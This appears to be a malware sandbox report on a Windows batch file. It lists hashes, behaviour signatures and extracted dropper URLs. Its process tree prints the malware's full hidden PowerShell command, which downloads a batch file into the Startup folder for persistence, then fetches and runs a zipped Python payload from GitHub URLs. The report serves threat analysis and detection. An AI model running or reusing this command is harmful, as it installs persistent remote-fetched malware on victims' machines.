Overview

overview

10

Static

static

1

bf9c2db653...6c.bat

windows7-x64

10

bf9c2db653...6c.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-11-2024 03:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bf9c2db653827ae40ddb78e9ea5733fbc917cc34247b0931b19ffae49fb31a6c.bat

  • Size

    271KB

  • MD5

    e7c99129a04e08ee965a08b79137b6a3

  • SHA1

    7e7060bd33efe7eeb2d3b9f2b27244dcd3fe709f

  • SHA256

    bf9c2db653827ae40ddb78e9ea5733fbc917cc34247b0931b19ffae49fb31a6c

  • SHA512

    89451efa002d7cd75c17ef4beb72d6d156695e83058e112fd85b354cf6085713b320e246264f728147e23980fbd6a512ac8518a118493bd1496971a9b3302b6f

  • SSDEEP

    1536:R2Vb2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VM2VR:D

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://github.com/rouki555/lnk/raw/main/ud.bat
exe.dropper

https://github.com/rouki555/dcm/raw/main/Document.zip

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Drops startup file 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\bf9c2db653827ae40ddb78e9ea5733fbc917cc34247b0931b19ffae49fb31a6c.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/rouki555/lnk/raw/main/ud.bat', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowSafety.bat');[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/rouki555/dcm/raw/main/Document.zip', 'C:\Users\Public\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\Users\Public\Document\python C:\Users\Public\Document\Lib\sim.py; del C:/Users/Public/Document.zip"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2348

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2348-4-0x000007FEF5E6E000-0x000007FEF5E6F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2348-5-0x000000001B720000-0x000000001BA02000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2348-6-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2348-7-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2348-8-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2348-9-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2348-11-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2348-10-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2348-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

    Filesize

    9.6MB

    Download